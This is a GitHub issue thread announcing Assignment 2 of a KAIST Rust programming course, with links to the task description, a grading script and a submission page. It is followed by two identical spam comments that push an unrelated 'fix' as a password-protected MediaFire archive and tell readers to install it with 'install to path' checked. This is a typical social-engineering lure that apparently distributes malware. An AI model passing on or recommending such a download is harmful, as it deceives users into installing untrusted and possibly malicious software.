### ISSUE TITLE
[Assignment 2] Mastering common programming concepts (1/2) (due: 10/04, 23:59:59 (KST))

### ISSUE THREAD

**Issue by Lee-Janggun** [kaist-cp/cs220#345]
Re-learn the common programming concepts in Rust, part 1.

- Read the description [here](https://github.com/kaist-cp/cs220/blob/main/src/assignments/assignment02/mod.rs). You're going to fill out the `todo!()`s.

- You can grade your solution yourself by running `./scripts/grade.sh 2`.

- Submit your code [here](https://gg.kaist.ac.kr/assignment/132/).

- **IMPORTANT**: only the last submission counts. Please make sure the last submission succeeds.

- **IMPORTANT**: don't fork this repository. It'll be public!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
